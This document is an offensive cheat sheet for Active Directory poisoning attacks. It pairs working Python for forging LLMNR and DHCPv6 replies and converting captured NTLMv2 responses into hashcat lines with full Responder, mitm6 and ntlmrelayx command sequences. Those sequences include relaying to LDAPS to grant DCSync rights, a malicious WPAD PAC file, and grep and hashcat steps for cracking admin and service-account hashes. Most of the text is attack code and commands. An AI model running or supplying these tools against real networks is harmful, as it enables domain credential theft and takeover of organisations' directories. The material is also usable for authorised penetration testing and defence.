Poisoning Attacks
Understanding AD Poisoning Attacks
Core Concept
Purpose: Answer Windows name resolution requests that DNS could not satisfy, so that the client connects to the attacker and authenticates with the logged-on user's domain NTLM credentials. What gets captured is the NTLMv2 challenge/response (a "Net-NTLMv2 hash") that can be cracked offline or relayed, not the NT hash itself.
Attack Flow:
AD Client → Broadcast Request → Attacker Response → Client Authentication → Domain Credential Capture
A domain-joined Windows client fails to resolve a name via DNS (typo, stale share path, decommissioned host)
The client falls back to LLMNR (multicast 224.0.0.252, UDP 5355) and then NBT-NS (subnet broadcast, UDP 137) and asks "who is <name>?"
The attacker answers first, claiming its own IP address is the requested host
The client connects (SMB, HTTP, ...) and authenticates to the attacker with the user's domain NTLM credentials
The attacker records the NTLMv2 response in hashcat format for offline cracking, or relays it live to another host
Requirements: A position on the same broadcast domain as the victims (LLMNR multicast and NBT-NS broadcasts do not cross routers), and LLMNR and/or NetBIOS over TCP/IP still enabled on the clients
Attack Value: Domain credential harvesting with nothing more than a network position; no exploit and no prior system access required
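The capture step in the flow above, as an added example that is not part of the original page: both sides of the NTLMv2 exchange in pure Python. The victim half builds the AUTHENTICATE_MESSAGE (NTLM Type 3) exactly as a Windows client would after receiving the attacker's challenge; the attacker half parses it into the hashcat -m 5600 line that Responder writes, and check_candidate shows what "offline cracking" actually computes for one password guess. The server challenge, client challenge, timestamp and account names are constructed values; the NT hash is the well-known MD4 of "password" and is assumed rather than computed, so the block has no MD4 dependency.

```python
import hashlib
import hmac
import struct

# Constructed values (not from a real capture). 1122334455667788 was Responder's classic fixed
# server challenge; current versions randomise it. The NT hash below is MD4(UTF-16LE("password")),
# the well-known value 8846f7eaee8fb117ad06bdd830b7586c, supplied as a constant.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
CLIENT_CHALLENGE = bytes.fromhex("0011223344556677")
TIMESTAMP = 0x01D9A6B4F1C2A3E0                    # arbitrary FILETIME
NT_HASH_PASSWORD = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")


def _u16(s: str) -> bytes:
    return s.encode("utf-16-le")


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain, UTF-16LE."""
    return hmac.new(nt_hash, _u16(user.upper() + domain), hashlib.md5).digest()


def build_blob(timestamp: int, client_challenge: bytes, domain: str) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE ('blob'): 0101 header, timestamp, client nonce, AV_PAIRs, terminator."""
    av_pairs = struct.pack("<HH", 2, len(_u16(domain))) + _u16(domain)   # MsvAvNbDomainName
    av_pairs += struct.pack("<HH", 0, 0)                                   # MsvAvEOL
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + av_pairs + b"\x00" * 4)


def build_type3(user: str, domain: str, workstation: str, nt_hash: bytes) -> bytes:
    """Victim side: the AUTHENTICATE_MESSAGE sent in reply to the attacker's CHALLENGE_MESSAGE."""
    blob = build_blob(TIMESTAMP, CLIENT_CHALLENGE, domain)
    nt_proof = hmac.new(ntowf_v2(nt_hash, user, domain), SERVER_CHALLENGE + blob, hashlib.md5).digest()
    fields = [b"\x00" * 24,            # LmChallengeResponse (zeros are common and irrelevant here)
              nt_proof + blob,         # NtChallengeResponse = NTProofStr || blob
              _u16(domain), _u16(user), _u16(workstation),
              b""]                     # EncryptedRandomSessionKey (none)
    header = b"NTLMSSP\x00" + struct.pack("<I", 3)
    payload, offset = b"", 64          # 64-byte header: no Version / MIC in this constructed message
    for f in fields:
        header += struct.pack("<HHI", len(f), len(f), offset)   # Len, MaxLen, Offset from message start
        payload += f
        offset += len(f)
    header += struct.pack("<I", 0x00088205)   # UNICODE | REQUEST_TARGET | NTLM | ALWAYS_SIGN | EXT_SESSIONSECURITY
    return header + payload


def _field(msg: bytes, pos: int) -> bytes:
    length, _max, offset = struct.unpack_from("<HHI", msg, pos)
    return msg[offset:offset + length]


def type3_to_hashcat(msg: bytes, server_challenge: bytes) -> str:
    """Attacker side: what Responder writes to its log, a hashcat -m 5600 line."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    nt_response = _field(msg, 20)
    domain = _field(msg, 28).decode("utf-16-le")
    user = _field(msg, 36).decode("utf-16-le")
    if len(nt_response) <= 24:
        raise ValueError("NTLMv1 response: that is hashcat -m 5500, not 5600")
    nt_proof, blob = nt_response[:16], nt_response[16:]
    return f"{user}::{domain}:{server_challenge.hex()}:{nt_proof.hex()}:{blob.hex()}"


def check_candidate(line: str, nt_hash: bytes) -> bool:
    """The offline-cracking step for one candidate: recompute NTProofStr and compare."""
    user, _lm, domain, challenge, proof, blob = line.split(":")
    expected = hmac.new(ntowf_v2(nt_hash, user, domain),
                        bytes.fromhex(challenge) + bytes.fromhex(blob), hashlib.md5).digest()
    return hmac.compare_digest(expected.hex(), proof)


if __name__ == "__main__":
    captured = type3_to_hashcat(build_type3("alice", "CORP", "WS01", NT_HASH_PASSWORD), SERVER_CHALLENGE)
    print(captured)
    print("password cracks:", check_candidate(captured, NT_HASH_PASSWORD))
```

The point worth noticing is that the server challenge is chosen by the attacker and the client challenge, timestamp and AV pairs are all sent in the clear; the only secret input to NTProofStr is the NT hash, which is why one captured line is enough for an offline dictionary attack and why the same account captured twice cracks to the same password.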
LLMNR & NBT-NS Poisoning
Link-Local Multicast Name Resolution (LLMNR)
Purpose: Poison LLMNR or NBT-NS name resolution requests to capture Windows domain authentication credentials. Windows tries DNS first, then LLMNR (UDP 5355 to multicast 224.0.0.252 / ff02::1:3), then NBT-NS (UDP 137 to the subnet broadcast address), so a poisoner that answers both catches every failed lookup on the segment.
Requirements:
For LLMNR Poisoning
Windows clients with LLMNR enabled (still the default unless disabled by GPO), multicast traffic allowed on the segment
For NBT-NS
NetBIOS over TCP/IP enabled on the client adapter (the "Default" setting leaves it on unless DHCP turns it off); domain membership is what makes the captured credentials domain credentials rather than local ones
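The two protocols described above on the wire, as an added example (not code from the page or from Responder): the LLMNR query a client multicasts, the poisoned answer an attacker sends back with the client's own transaction ID, the parse the client does of that answer, and the NBT-NS "first-level" name encoding that makes NetBIOS queries look like strings of A-P letters in a packet capture. The host name, attacker IP and transaction IDs are constructed; nothing is sent on the network, so it runs offline. A real poisoner such as Responder binds UDP/5355 on the multicast group and UDP/137 on the broadcast address and simply feeds each received datagram through logic like poison_llmnr.

```python
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # where a Windows client multicasts after DNS fails
NBNS_PORT = 137                                  # NBT-NS goes to the subnet broadcast address


def encode_name(name: str) -> bytes:
    """DNS-style label encoding (LLMNR reuses the DNS wire format)."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"


def decode_name(buf: bytes, pos: int):
    """Return (name, position after the name). LLMNR queries do not use compression pointers."""
    labels = []
    while True:
        n = buf[pos]
        pos += 1
        if n == 0:
            return ".".join(labels), pos
        labels.append(buf[pos:pos + n].decode())
        pos += n


def llmnr_query(txid: int, name: str) -> bytes:
    """Client side: header (ID, flags=0, QDCOUNT=1) plus one A/IN question."""
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", 1, 1)


def poison_llmnr(query: bytes, attacker_ip: str, ttl: int = 30):
    """Attacker side: answer any A query with our own address, echoing the client's transaction ID.
    Returns None for packets we should not answer (responses, or queries that are not A/IN)."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack_from("!HHHHHH", query, 0)
    if flags & 0x8000 or qdcount != 1 or ancount != 0:
        return None
    name, pos = decode_name(query, 12)
    qtype, qclass = struct.unpack_from("!HH", query, pos)
    if (qtype, qclass) != (1, 1):
        return None
    answer = encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(attacker_ip)
    return struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0) + query[12:pos + 4] + answer


def parse_llmnr_answer(resp: bytes):
    """Client side: (txid, name, ip) from a response carrying one A answer; this is all the victim checks."""
    txid, flags, _, ancount, _, _ = struct.unpack_from("!HHHHHH", resp, 0)
    if not flags & 0x8000 or ancount != 1:
        raise ValueError("not a single-answer response")
    name, pos = decode_name(resp, 12)
    pos += 4                                       # skip QTYPE/QCLASS of the echoed question
    _, pos = decode_name(resp, pos)
    _rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHIH", resp, pos)
    return txid, name, socket.inet_ntoa(resp[pos + 10:pos + 10 + rdlen])


def nbns_encode(name: str, suffix: int = 0x20) -> bytes:
    """NBT-NS first-level encoding: 15-char space-padded name + service suffix (0x20 = file server),
    each nibble mapped to 'A'..'P', wrapped as a single 32-byte label."""
    raw = name.upper().ljust(15)[:15].encode() + bytes([suffix])
    return b"\x20" + b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0xF)]) for b in raw) + b"\x00"


def nbns_decode(label: bytes):
    """Inverse of nbns_encode: (name, suffix)."""
    enc = label[1:33]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode().rstrip(), raw[15]


def nbns_query(txid: int, name: str) -> bytes:
    """Client side: NBT-NS NAME QUERY REQUEST, flags 0x0110 = query, broadcast, recursion desired, QTYPE NB."""
    return struct.pack("!HHHHHH", txid, 0x0110, 1, 0, 0, 0) + nbns_encode(name) + struct.pack("!HH", 0x20, 1)


if __name__ == "__main__":
    q = llmnr_query(0xBEEF, "fileserv01")           # a victim looking for a decommissioned file server
    r = poison_llmnr(q, "10.0.0.66")                # the attacker's answer
    print(parse_llmnr_answer(r))                    # (48879, 'fileserv01', '10.0.0.66')
    print(nbns_query(0x1234, "fileserv01").hex())
```

Nothing in either protocol authenticates the answer: the client accepts the first response whose transaction ID matches, and the ID is in the query it just broadcast. That is the whole vulnerability, and it is why the only real fixes are disabling LLMNR and NetBIOS over TCP/IP rather than anything on the wire.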
LLMNR & NBT-NS Poisoning with Responder
Step 1:
# Start Responder and wait for authentication events.
# -w serves a WPAD file; -d additionally answers DHCP broadcasts and injects the WPAD URL into the
# DHCP response (disruptive; in Responder versions before 3.0, -d meant --NBTNSdomain instead).
# Run with -A first if you only want to see which names are being asked for, without poisoning.
sudo responder -I eth0 -dw
Step 2:
Wait for a natural authentication event (a mistyped share name, a logon script or scheduled task pointing at a host that no longer exists), or force one yourself.
For more information about forcing authentication, see Authentication Triggers and Forcing Techniques
DHCPv6 Poisoning for AD Environments
IPv6 DHCP Poisoning with AD DNS Takeover
Purpose: Use DHCPv6 to become the DNS server for Windows AD clients, so that every name they look up (including wpad) resolves to the attacker, and capture or relay the resulting authentication attempts.
Requirements: IPv6 enabled on the Windows clients (the default) and no legitimate DHCPv6 server on the segment. Windows prefers the IPv6 DNS server it is handed over its IPv4 one, so the attacker takes over DNS without touching the IPv4 configuration at all.
Attack Value: Full DNS control over the clients. The most useful captures are WPAD/HTTP authentications, which can be relayed to LDAP or LDAPS on a domain controller; SMB signing does not protect that path (LDAP signing and channel binding do). Works on networks where IPv4 poisoning is blocked or monitored.
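The DHCPv6 half of the attack, as an added example that is not part of the page and not mitm6's code: a constructed client SOLICIT (Windows includes its FQDN in option 39), the attacker's ADVERTISE that hands back a throwaway address plus OPTION_DNS_SERVERS pointing at the attacker's link-local address, and the two filters the mitm6 flags in the next section refer to: refusing clients without an FQDN option (the idea behind --ignore-nofqdn) and answering only allowlisted hostnames (the idea behind --host-allowlist). The DUIDs, addresses and domain are assumptions. The REQUEST/REPLY round that follows a real ADVERTISE, and the DNS answering that makes the takeover useful, are left out.

```python
import ipaddress
import struct

SOLICIT, ADVERTISE = 1, 2
OPT_CLIENTID, OPT_SERVERID, OPT_IA_NA, OPT_IAADDR = 1, 2, 3, 5
OPT_DNS_SERVERS, OPT_DOMAIN_LIST, OPT_CLIENT_FQDN = 23, 24, 39
# Clients multicast SOLICIT to ff02::1:2 on UDP/547 from UDP/546; the codes above are RFC 8415/4704 values.


def dns_name(name: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"


def dns_name_decode(buf: bytes) -> str:
    labels, pos = [], 0
    while pos < len(buf) and buf[pos]:
        n = buf[pos]
        labels.append(buf[pos + 1:pos + 1 + n].decode())
        pos += 1 + n
    return ".".join(labels)


def opt(code: int, data: bytes) -> bytes:
    return struct.pack("!HH", code, len(data)) + data


def parse_options(buf: bytes) -> dict:
    opts, pos = {}, 0
    while pos + 4 <= len(buf):
        code, length = struct.unpack_from("!HH", buf, pos)
        opts[code] = buf[pos + 4:pos + 4 + length]
        pos += 4 + length
    return opts


def solicit(txid: int, duid: bytes, iaid: int, fqdn=None) -> bytes:
    """Client side (constructed): a SOLICIT with a DUID, an IA_NA and, as Windows does, the Client FQDN option."""
    body = opt(OPT_CLIENTID, duid) + opt(OPT_IA_NA, struct.pack("!III", iaid, 0, 0))
    if fqdn is not None:
        body += opt(OPT_CLIENT_FQDN, b"\x00" + dns_name(fqdn))     # flags byte, then the name
    return bytes([SOLICIT]) + txid.to_bytes(3, "big") + body


def poison_dhcpv6(pkt: bytes, attacker_ll: str, domain: str, server_duid: bytes,
                  require_fqdn: bool = True, host_allowlist=None):
    """Attacker side: an ADVERTISE that makes us the client's DNS server, or None when the packet is
    filtered out (not a SOLICIT, no FQDN option, or a host that is not on the allowlist)."""
    if not pkt or pkt[0] != SOLICIT:
        return None
    txid, opts = pkt[1:4], parse_options(pkt[4:])
    fqdn = dns_name_decode(opts[OPT_CLIENT_FQDN][1:]) if OPT_CLIENT_FQDN in opts else None
    if require_fqdn and fqdn is None:
        return None
    if host_allowlist is not None and (fqdn or "").lower() not in {h.lower() for h in host_allowlist}:
        return None
    iaid = struct.unpack_from("!I", opts[OPT_IA_NA], 0)[0]
    # The address we hand out is a throwaway from a ULA prefix; the payload that matters is DNS_SERVERS
    lease = ipaddress.IPv6Address("fd00:dead:beef::%x" % (int.from_bytes(txid, "big") % 0xFFFF + 1))
    ia_addr = opt(OPT_IAADDR, lease.packed + struct.pack("!II", 300, 300))   # preferred/valid lifetimes
    body = (opt(OPT_CLIENTID, opts[OPT_CLIENTID])
            + opt(OPT_SERVERID, server_duid)
            + opt(OPT_IA_NA, struct.pack("!III", iaid, 200, 250) + ia_addr)
            + opt(OPT_DNS_SERVERS, ipaddress.IPv6Address(attacker_ll).packed)
            + opt(OPT_DOMAIN_LIST, dns_name(domain)))
    return bytes([ADVERTISE]) + txid + body


def advertised_dns(pkt: bytes):
    """Client side: (dns_server, search_domain) the client will now use for every lookup."""
    opts = parse_options(pkt[4:])
    return (str(ipaddress.IPv6Address(opts[OPT_DNS_SERVERS][:16])),
            dns_name_decode(opts[OPT_DOMAIN_LIST]))


if __name__ == "__main__":
    duid = bytes.fromhex("000100011c39cf88080027fdd2f3")           # constructed DUID-LLT of the victim
    ours = bytes.fromhex("0003000100505600aabbcc")                # constructed DUID-LL for the attacker
    s = solicit(0xABCDEF, duid, 0x0E001122, "ws01.company.com")
    adv = poison_dhcpv6(s, "fe80::1337", "company.com", ours)
    print(advertised_dns(adv))                                    # ('fe80::1337', 'company.com')
```

Short lease lifetimes are deliberate: the client comes back to renew every few minutes, which is what keeps the attacker's DNS setting alive for as long as the tool runs and lets the setting expire on its own once it stops.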
mitm6 - Advanced IPv6 Attack for AD
# Basic DHCPv6 DNS takeover: reply to DHCPv6 requests and answer DNS queries only for names in company.com
sudo mitm6 -d company.com
# Only serve clients whose DHCPv6 request carries the FQDN option (Windows hosts do; printers and
# other noise usually do not)
sudo mitm6 -d company.com --ignore-nofqdn
# Restrict DHCPv6 replies to specific clients, matched on the FQDN they send in their request
# (-hw / --host-allowlist; older releases call it --host-whitelist). List workstations here:
# servers rarely renew over DHCPv6, and you do not want the DC's DNS pointed at you anyway
echo "ws01.company.com" > ad_targets.txt
echo "ws02.company.com" >> ad_targets.txt
sudo mitm6 -d company.com --host-allowlist ad_targets.txt
# mitm6 only poisons DHCPv6 and DNS; it has no relay option of its own. Relaying is ntlmrelayx's job.
DHCPv6 + NTLM Relay for AD Compromise
# Terminal 1: IPv6 DNS takeover (mitm6 logs to stdout; tee it if you want a file)
sudo mitm6 -d company.com --ignore-nofqdn -v | tee mitm6.log
# Terminal 2: serve WPAD under a name mitm6 will resolve to us, demand proxy authentication and
# relay it to LDAPS on the DC. --escalate-user grants <username> replication (DCSync) rights when
# a sufficiently privileged account is relayed; --delegate-access (RBCD via a new computer account)
# is the usual alternative when the relayed account is an ordinary user
python3 ntlmrelayx.py -6 -t ldaps://<DC-IP> -wh attacker-wpad --escalate-user <username>
# Terminal 3: watch for domain authentication. ntlmrelayx prints every authentication it receives
# and the outcome of each relay in Terminal 2 and writes dumped LDAP data to its loot directory (-l);
# the mitm6 log from Terminal 1 shows which clients took the DHCPv6 bait
tail -f mitm6.log
WPAD Poisoning in AD Environments
Web Proxy Auto-Discovery for Domain Credentials
Purpose: Exploit automatic proxy configuration (WPAD) to route the victim's web traffic through an attacker-controlled proxy and capture domain user credentials.
Requirements: "Automatically detect settings" enabled on the client (the Windows default), and a way to make the name wpad resolve to the attacker: LLMNR/NBT-NS poisoning (a wpad DNS record is normally absent, and Microsoft DNS servers refuse to answer the name by default via the global query block list) or DHCPv6 DNS takeover. Domain users then only need a browser or any component that honours the system proxy settings to make a request.
Attack Value: Captures domain credentials without the user opening a share or typing anything; the browser or system component authenticates to the proxy in the background.
WPAD Attack with Responder for AD
# Answer LLMNR/NBT-NS queries for "wpad" and serve a wpad.dat pointing at Responder's proxy
sudo responder -I eth0 -w -v
# Force NTLM authentication when the client fetches wpad.dat itself (-F); this may pop a credential
# prompt for the user, so it is the noisier option
sudo responder -I eth0 -w -F
# Quieter: serve the PAC unauthenticated and demand NTLM proxy authentication (HTTP 407) when the
# client uses the proxy (-P); add -b to downgrade to Basic auth and receive cleartext passwords
sudo responder -I eth0 -w -P
# Also push the WPAD URL (DHCP option 252) to clients in rogue DHCP replies; disruptive, use with care
sudo responder -I eth0 -w -d
# WPAD over IPv6 is done with mitm6 (see above) combined with ntlmrelayx -wh, not with Responder flags
Custom WPAD for AD Credential Harvesting
# Create an AD-targeted PAC file. Windows fetches it as http://wpad/wpad.dat, so name it wpad.dat.
# Only traffic to internal AD resources is sent through the attacker's proxy; everything else stays
# DIRECT, which keeps the victim's internet working and the attack quiet
cat > wpad.dat << 'EOF'
function FindProxyForURL(url, host) {
    // Only intercept internal AD resources
    if (shExpMatch(host, "*.company.com") ||
        shExpMatch(host, "sharepoint*") ||
        shExpMatch(host, "exchange*")) {
        return "PROXY <attacker-ip>:8080";
    }
    return "DIRECT";
}
EOF
# Serve it. Port 80 needs root, and Responder's own HTTP server must be Off in Responder.conf
# (or Responder stopped) or the two fight over the port. The name "wpad" still has to resolve to
# <attacker-ip>, via Responder's LLMNR/NBT-NS poisoning or mitm6's DNS
sudo python3 -m http.server 80 --directory /path/to/wpad/
# Something must demand authentication on <attacker-ip>:8080: ntlmrelayx's HTTP listener
# (-wh serves its own PAC and answers with 407 Proxy-Authenticate: NTLM) or Responder's proxy
# (-P, which listens on 3128, so adjust the port in the PAC)
Integrated AD Poisoning Workflows
Comprehensive AD Credential Harvesting
# Multi-protocol AD poisoning campaign
# Terminal 1: IPv6 attack for modern Windows AD clients
sudo mitm6 -d company.com --ignore-nofqdn
# Terminal 2: IPv4 poisoning (LLMNR/NBT-NS/mDNS) for all AD systems. -w serves WPAD; -v prints
# every hash instead of skipping hosts already captured. -f (fingerprinting) from older cheat
# sheets is gone in Responder 3.x and -r (wredir) breaks things on the network
sudo responder -I eth0 -w -v
# Terminal 3: watch for domain credentials. Responder writes a session log plus one hash file per
# client and protocol under logs/
tail -f /usr/share/responder/logs/Responder-Session.log | grep -E "(COMPANY\\\\|company\.com)"
Targeted AD Poisoning with Relay
# Phase 1: see who asks for what before poisoning. -A (analyze) only listens and logs, it does not answer
sudo responder -I eth0 -A
# For the relay itself Responder must not answer SMB or HTTP, or it captures the hash instead of
# letting ntlmrelayx relay it: set SMB = Off and HTTP = Off in Responder.conf, then poison for real
sudo responder -I eth0 -w -v
# Phase 2: relay captured AD authentication. ad_targets.txt must hold hosts that do not require SMB
# signing, or the relayed session is rejected; the default action dumps the local SAM, which only
# works when the relayed user is a local administrator on the target
python3 ntlmrelayx.py -tf ad_targets.txt -smb2support
# Phase 3: authentication arrives whenever a client references a name DNS cannot resolve, e.g. a
# lab victim browsing \\fake-dc\sysvol or running:
net use \\fake-server\netlogon
High-Value AD Target Identification
# Responder keeps one hash file per client and protocol (e.g. SMB-NTLMv2-SSP-10.10.14.23.txt) in
# hashcat format, user::DOMAIN:challenge:NTProofStr:blob, so the username is the first field
# Administrative or service-looking accounts
grep -hiE '^[^:]*(admin|svc|service|backup|sql|exchange)[^:]*::' /usr/share/responder/logs/*NTLMv2*.txt | cut -d: -f1,3 | sort -u
# Domain controllers and other computers show up as machine accounts (name ends in $). Their
# passwords are random and 120 characters long, so they never crack, but they are prime relay candidates
grep -hiE '^(dc|pdc)[0-9]*\$::' /usr/share/responder/logs/*NTLMv2*.txt | cut -d: -f1,3 | sort -u
# Which hosts sent credentials: the client IP is in the file name
ls /usr/share/responder/logs/ | grep NTLMv2
Post-Capture AD Credential Processing
Domain Credential Extraction and Analysis
# Collect every capture; the per-client files already hold hashcat -m 5600 lines
cat /usr/share/responder/logs/*NTLMv2*.txt > ad_hashes.txt
# Keep only the target domain (field 3 is the domain)
awk -F: 'toupper($3) == "COMPANY"' ad_hashes.txt > domain_hashes.txt
# One hash per account is enough (every capture of a user cracks to the same password), and drop
# machine accounts, which are not worth cracking
grep -vE '^[^:]+\$::' domain_hashes.txt | sort -t: -k1,1 -u > formatted_ad_hashes.txt
# Identify high-value AD accounts before spending GPU time
grep -iE '^[^:]*(admin|da-|service|svc|sql|exchange|backup)[^:]*::' formatted_ad_hashes.txt
# Crack offline; -m 5600 is NetNTLMv2 and the line format already carries the username
hashcat -m 5600 formatted_ad_hashes.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
hashcat -m 5600 formatted_ad_hashes.txt --show
AD Environment Validation
# Confirm the captures are domain credentials: list the domains seen (field 3) with counts
cut -d: -f3 /usr/share/responder/logs/*NTLMv2*.txt | sort | uniq -c | sort -rn
# Identify domain controllers from captures: they authenticate as machine accounts such as DC01$
grep -hiE '^dc[0-9]*\$::' /usr/share/responder/logs/*NTLMv2*.txt | cut -d: -f1,3 | sort -u
# Map AD infrastructure from the names clients were looking for. Stale file servers, Exchange and
# SharePoint names that no longer resolve are exactly what gets poisoned
grep -h "Poisoned answer sent" /usr/share/responder/logs/Poisoners-Session.log | grep -oiE 'for name .*' | sort | uniq -c | sort -rn
grep -hiE 'for name (exchange|sharepoint|sql)' /usr/share/responder/logs/Poisoners-Session.log
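The triage the "High-Value AD Target Identification" and "Post-Capture AD Credential Processing" sections do with grep, sed and sort, as one added Python example (not code from the page or from Responder). It pulls every NetNTLMv2 line out of Responder output regardless of which file it came from, keeps one hash per account, drops machine accounts unless asked not to, flags privileged-looking names and writes the hashcat -m 5600 input with those at the top. The log excerpts are constructed in the shape of Responder's Responder-Session.log and per-client hash files, with shortened blobs; the naming patterns in HIGH_VALUE_RE are an assumption to tune per target.

```python
import re

# Constructed sample in the shape of Responder's output: a few lines of Responder-Session.log
# (the "[proto] ... Hash : " lines) plus the contents of one per-client hash file
# (logs/SMB-NTLMv2-SSP-<ip>.txt holds bare hashcat lines). Blobs are shortened; real ones are long.
SAMPLE_SESSION_LOG = """\
[SMB] NTLMv2-SSP Client   : 10.10.14.23
[SMB] NTLMv2-SSP Username : CORP\\alice
[SMB] NTLMv2-SSP Hash     : alice::CORP:1122334455667788:0cd63f14a7ba5c8bcd2e6a1a5b0a7c3e:0101000000000000a0
[HTTP] NTLMv2 Client   : 10.10.14.23
[HTTP] NTLMv2 Username : CORP\\alice
[HTTP] NTLMv2 Hash     : alice::CORP:aabbccdd00112233:8d4e6f2a1b3c4d5e6f7a8b9c0d1e2f3a:0101000000000000b1
[SMB] NTLMv2-SSP Client   : 10.10.14.40
[SMB] NTLMv2-SSP Username : CORP\\svc-sql
[SMB] NTLMv2-SSP Hash     : svc-sql::CORP:1122334455667788:11112222333344445555666677778888:0101000000000000c2
"""
SAMPLE_HASH_FILE = """\
WS01$::CORP:1122334455667788:99998888777766665555444433332222:0101000000000000d3
bob::SALES:1122334455667788:12345678123456781234567812345678:0101000000000000e4
"""

# user::DOMAIN:8-byte server challenge:16-byte NTProofStr:blob  (hashcat -m 5600)
HASH_RE = re.compile(r"([^:\s]+)::([^:\s]+):([0-9a-fA-F]{16}):([0-9a-fA-F]{32}):([0-9a-fA-F]+)")
# Naming patterns worth cracking first; an assumption, tune to the target's conventions
HIGH_VALUE_RE = re.compile(r"admin|^da[-_]|^svc[-_]|service|sql|exchange|backup", re.I)


def extract_hashes(text: str):
    """Yield (user, domain, hashcat_line) for every NetNTLMv2 line in Responder output, whatever file it came from."""
    for m in HASH_RE.finditer(text):
        yield m.group(1), m.group(2), m.group(0)


def triage(*sources: str, skip_machine_accounts: bool = True):
    """One hash per account (the first capture is enough: every capture of a user cracks to the same
    password), machine accounts dropped by default (their 120-character random passwords never crack,
    but they do relay), and privileged-looking names flagged for priority cracking."""
    seen = {}
    for text in sources:
        for user, domain, line in extract_hashes(text):
            if skip_machine_accounts and user.endswith("$"):
                continue
            seen.setdefault((domain.upper(), user.lower()), (user, line))
    return [{"account": f"{d}\\{user}", "hashcat": line, "high_value": bool(HIGH_VALUE_RE.search(user))}
            for (d, _), (user, line) in sorted(seen.items())]


def hashcat_input(entries, high_value_first: bool = True) -> str:
    """The file to feed `hashcat -m 5600`, most valuable accounts at the top."""
    ordered = sorted(entries, key=lambda e: not e["high_value"]) if high_value_first else list(entries)
    return "".join(e["hashcat"] + "\n" for e in ordered)


if __name__ == "__main__":
    entries = triage(SAMPLE_SESSION_LOG, SAMPLE_HASH_FILE)
    for e in entries:
        print(("HIGH  " if e["high_value"] else "      ") + e["account"])
    print(hashcat_input(entries), end="")
```

Deduplicating on (domain, user) rather than on the whole line matters: every capture carries a fresh server challenge and client blob, so sort -u on raw lines keeps them all and hashcat wastes time cracking the same password several times over.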